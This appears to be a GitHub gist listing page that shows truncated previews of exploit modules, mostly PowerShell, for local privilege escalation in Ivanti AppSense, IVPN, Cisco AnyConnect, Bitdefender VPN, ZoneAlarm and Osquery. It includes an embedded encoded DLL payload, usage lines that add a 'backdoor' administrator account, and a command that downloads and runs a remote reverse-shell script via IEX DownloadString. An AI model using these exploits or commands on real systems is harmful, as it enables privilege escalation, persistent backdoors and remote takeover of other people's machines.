This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import json | |
import random | |
import urllib3 | |
import requests | |
import urllib.parse | |
base_url='https://127.0.0.1/' | |
username='admin' | |
password='initial' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
trap cleanup INT | |
function cleanup() | |
{ | |
if [ -f /tmp/run-result-reader.sh ] | |
then | |
/usr/bin/cat /tmp/run-result-reader.sh > /opt/qvm/iem/bin/run-result-reader.sh | |
/usr/bin/rm -f /tmp/run-result-reader.sh | |
fi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
.Synopsis | |
This module can be used to invoke the Self-Elevation functionality of | |
Ivanti AppSense Application Manager | |
.Description | |
This module uses the AMShellIntegration.AMShellContextMenu COM component to | |
invoke the Self-Elevation functionality of Ivanti AppSense Application | |
Manager. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# kill OneDrive if it's running | |
Get-Process -Name OneDrive -ErrorAction SilentlyContinue | Stop-Process -ErrorAction SilentlyContinue | |
# embedded 32-bit DLL that runs calc.exe | |
$EncodedCompressedFile = "H4sICOaxZ14AA2RsbF94ODYuZGxsAOw7C3RTZZp/mlsaSyARU6hQJGqYKS507+2L5kVb2gooj2oLojzT9gZi27QkN7T4bE1z9O41TtyVXR8zSgfP6hzrrjgMT4+TEqDgY6zISrUeDiPgphOUIh7sipL9vv/etCkyMzvnuGfcWf7y57/3v9//vf7v9d+ERfeEiJoQwkCPxwnZReRWQv58a4M+ftqe8WT7Ne/euEu18N0bq9e7vMZmT9M6j6PRWOtwu5sEYw1v9PjcRpfbWL6kytjYVMfnjBuXblJwVFYQslCVPgrvCTL+5rGqlBvJRLjJl5lruw5GPXQWIbrq6XWKzLdK4Z+2sHxz6SQBuUrgkVFehx96GYQOzYQIihCm4cVXaK8RkjXmjz+eWUJI5hXmDwHex/8E2hyBb0X6dQaFoYnJQshtLalcm1PnEBxIBydQdpCZTB4NV0LYcI5HBnxDTeTNQ1xZ34MrydkgNPKCo86IeCoVOOPlcGtLcmq8XrzuUlNGrtjayNpwDi/TpbpsVvgzjYajdF0yHNV1G3TU6U+uIEfZndUkIW9IwTfzCnBCA+VPgx9bFLicK+mFb2iqVfbwNWUB+z24uVeW8G+/+c9k9TAmsrarPspNgNv9WZHgdrovwR34edeyKv8ZvVRuMgXCPo+UoQXIwJGH7vL/QcXF30TPE+lcbKIMD8iiYDLxDNLeVe8/w4hDg7ptBS/WwqqwGPGd6HwZLv1DKbqOT2XoaTBE//VaiDyIzL9fv2L1mn1aojAR8g+pdIGX4KquE92MuyAtZyQ7Io9lBoWfEHNE13Eoie4xpD |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# embedded 32-bit DLL that runs calc.exe | |
$EncodedCompressedFile = "H4sICOaxZ14AA2RsbF94ODYuZGxsAOw7C3RTZZp/mlsaSyARU6hQJGqYKS507+2L5kVb2gooj2oLojzT9gZi27QkN7T4bE1z9O41TtyVXR8zSgfP6hzrrjgMT4+TEqDgY6zISrUeDiPgphOUIh7sipL9vv/etCkyMzvnuGfcWf7y57/3v9//vf7v9d+ERfeEiJoQwkCPxwnZReRWQv58a4M+ftqe8WT7Ne/euEu18N0bq9e7vMZmT9M6j6PRWOtwu5sEYw1v9PjcRpfbWL6kytjYVMfnjBuXblJwVFYQslCVPgrvCTL+5rGqlBvJRLjJl5lruw5GPXQWIbrq6XWKzLdK4Z+2sHxz6SQBuUrgkVFehx96GYQOzYQIihCm4cVXaK8RkjXmjz+eWUJI5hXmDwHex/8E2hyBb0X6dQaFoYnJQshtLalcm1PnEBxIBydQdpCZTB4NV0LYcI5HBnxDTeTNQ1xZ34MrydkgNPKCo86IeCoVOOPlcGtLcmq8XrzuUlNGrtjayNpwDi/TpbpsVvgzjYajdF0yHNV1G3TU6U+uIEfZndUkIW9IwTfzCnBCA+VPgx9bFLicK+mFb2iqVfbwNWUB+z24uVeW8G+/+c9k9TAmsrarPspNgNv9WZHgdrovwR34edeyKv8ZvVRuMgXCPo+UoQXIwJGH7vL/QcXF30TPE+lcbKIMD8iiYDLxDNLeVe8/w4hDg7ptBS/WwqqwGPGd6HwZLv1DKbqOT2XoaTBE//VaiDyIzL9fv2L1mn1aojAR8g+pdIGX4KquE92MuyAtZyQ7Io9lBoWfEHNE13Eoie4xpDkINKfKNH3HuX6FpkrXMR5o0LtAWNexjSg39NFBuAv06zoknM0uQRAhS6o2ZfeUmxg0LrHapIF7o2gwxXv9Z7T+VJRbBRxTzmW2Q6NvnaGEco+ChD2pSA3FepRyd5nEVH97cW7gt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
Example usage: | |
Import-Module .\Invoke-ExploitIVPNLPE.psd1 | |
Invoke-ExploitIVPNLPEConfigHijack "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add" | |
Invoke-ExploitIVPNLPEPkcs11 "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add" | |
Invoke-ExploitIVPNLPEConfigOption -Command "powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')" | |
#> | |
@{ | |
RootModule = 'Invoke-ExploitIVPNLPE.psm1' | |
ModuleVersion = '1.0' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
.Synopsis | |
This module exploits a path traversal vulnerability in vpndownloader.exe of the Cisco AnyConnect client for Windows | |
.Description | |
This module exploits a path traversal vulnerability in vpndownloader.exe of the Cisco AnyConnect client for Windows. | |
When the -Command argument isn't provided a DLL is created at C:\Program Files\Common Files\microsoft shared\ink\HID.dll. | |
This DLL is used by the On-Screen Keyboard (osk.exe) of Windows, which is exposed on the login/lock screen. | |
Opening the On-Screen Keyboard on this screen will run our DLL with LocalSystem privileges. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
.Synopsis | |
Exploit module for Bitdefender VPN for Windows | |
.Parameter Command | |
Command(s) to be executed when openvpn.exe is started | |
.Example | |
Import-Module .\Invoke-ExploitBdVpnLpe.psm1 | |
Invoke-ExploitBdVpnLpe "net user backdoor P@ssword /add" "net localgroup administrators backdoor /add" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
.Synopsis | |
This module exploits a vulnerability in the TrueVector Internet Monitor service of CheckPoint ZoneAlarm to gain elevated privileges | |
.Description | |
This module exploits a vulnerability in the TrueVector Internet Monitor service, which is installed as part of CheckPoint ZoneAlarm. | |
The affected service is running as LocalSystem, it will periodically create a number of backup files within the ProgramData folder. | |
When these files are created, their file permissions are explicitly set to Full Control for Authenticated Users. | |
A local attacker can create a hardlink with the same name as the backup files, causing the permissions of another file to be changed. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
.Synopsis | |
Exploit module for CVE-2019-3567 - Osquery for Windows access right misconfiguration Elevation of Privilege | |
.Description | |
This modules exploits a vulnerability in Osquery < 3.4.0. | |
It was found that Osquery is installed in %ProgramData%, which has weak file permissions. | |
A local user can exploit this issue to run arbitrary code with SYSTEM privileges. | |
https://offsec.almond.consulting/osquery-windows-acl-misconfiguration-eop.html |